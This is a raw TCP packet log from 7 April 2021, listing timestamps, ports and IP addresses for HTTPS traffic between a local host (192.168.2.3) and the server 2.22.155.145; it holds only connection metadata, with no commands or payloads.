Apr 7, 2021 11:56:14.200484037 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200530052 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200587034 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200608015 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200637102 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200639009 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200670004 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200680017 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200692892 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200704098 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200714111 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200736046 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200736046 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200788975 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200808048 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200809002 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200860023 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200932980 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200953007 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200973988 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.200985909 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.200995922 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201014996 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201045990 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201081991 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201129913 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201251030 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201307058 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201503992 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201523066 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201554060 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201575994 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201581001 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201626062 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201627970 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201666117 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201679945 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201687098 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201709032 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201714993 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201729059 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201749086 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201751947 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201775074 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201781988 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201812029 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201814890 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201852083 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201875925 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201875925 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201899052 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.201924086 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201947927 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.201961040 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.202007055 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.202012062 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.202030897 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:14.202060938 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.202084064 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.203823090 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:14.216998100 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.597184896 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.597677946 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.598047972 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.598655939 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.609064102 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.609179020 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.609757900 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.609818935 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.610196114 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.610271931 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.610873938 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.621603966 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.622484922 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.623596907 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.623626947 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.623658895 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.623663902 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.623696089 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.623773098 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.624367952 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.624403954 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.624427080 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.624429941 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.624449015 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.624469042 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.627583981 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.628144979 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.639311075 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.639532089 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.639671087 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.639684916 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.641273022 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.641340971 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.778202057 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:22.792020082 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.796453953 CEST	443	49735	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:22.796576977 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.077756882 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.077811003 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.077861071 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.077872992 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.077923059 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.077929020 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.078022957 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.078079939 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.078082085 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.078130960 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.078141928 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.078191042 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.273750067 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.273780107 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:23.273855925 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:23.273916006 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:34.221882105 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:34.221910000 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:34.222027063 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:34.512954950 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:34.526150942 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.790040970 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.790091991 CEST	49735	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.790497065 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.802179098 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.937144041 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.960640907 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960701942 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960779905 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960835934 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.960840940 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960865974 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.960902929 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960916996 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.960963964 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:36.960967064 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:36.961024046 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.079721928 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.132756948 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.189008951 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.189253092 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.214011908 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.214066029 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.214111090 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.214159966 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.233098984 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.247138023 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266547918 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266607046 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266642094 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266666889 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266669989 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266717911 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266724110 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266767979 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266773939 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266818047 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266818047 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266868114 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266870022 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266916037 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266922951 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.266963005 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:37.266966105 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:37.267016888 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.193011045 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.205477953 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222636938 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222700119 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222750902 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222779989 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222800970 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222803116 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222809076 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222851038 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222861052 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222899914 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222908974 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222949028 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.222949028 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.222997904 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.223002911 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.223045111 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.223047972 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.223094940 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.836594105 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.836863041 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.848493099 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.848567009 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862350941 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862425089 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862471104 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862493038 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862504005 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862572908 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862576008 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862633944 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862638950 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862684965 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862704039 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862756014 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862822056 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862878084 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862927914 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.862982035 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.862991095 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.863042116 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.863044024 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.863090038 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.863095045 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.863137007 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.863151073 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.863202095 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.876153946 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.876267910 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.888247013 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.888303041 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.888411045 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.888468981 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.889359951 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.889400959 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.901010036 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.901073933 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.901125908 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.901175976 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.901439905 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.901489973 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903070927 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903137922 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903155088 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.903187990 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.903198004 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903240919 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.903259993 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903326988 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.903331041 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903387070 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.903389931 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.903444052 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.916749954 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.916970968 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.928452015 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.928637981 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.928682089 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.928709030 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:38.929712057 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:38.929790974 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.061861992 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.073512077 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:39.073570967 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:39.073632956 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.630542994 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.642563105 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:39.867043018 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:39.867140055 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.989053965 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.989171028 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:39.989291906 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:40.000885963 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.000935078 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.000998974 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.001019001 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.001025915 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.001112938 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.001142979 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.002466917 CEST	443	49738	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:40.002635956 CEST	49738	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:40.669044971 CEST	49739	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:40.681010962 CEST	443	49739	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.129470110 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.181905985 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205559015 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205629110 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205697060 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205746889 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205761909 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205782890 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205789089 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205822945 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205831051 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205882072 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205885887 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.205945015 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.205946922 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206006050 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206007004 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206063986 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206068039 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206126928 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206130028 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206190109 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206192970 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206249952 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206264019 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206302881 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206310034 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206362963 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206363916 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206429958 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206437111 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206494093 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206499100 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206543922 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206548929 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206594944 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206600904 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206644058 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206650972 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206693888 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206700087 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206743002 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206752062 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206793070 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206796885 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206835032 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.206849098 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.206891060 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.754075050 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:41.766057968 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.766119003 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.767595053 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:41.767734051 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.745145082 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.745935917 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.758852959 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.759692907 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.763154030 CEST	443	49734	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.763256073 CEST	49734	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767026901 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767091990 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767115116 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767136097 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767206907 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:42.767249107 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:42.767261028 CEST	443	49732	2.22.155.145	192.168.2.3
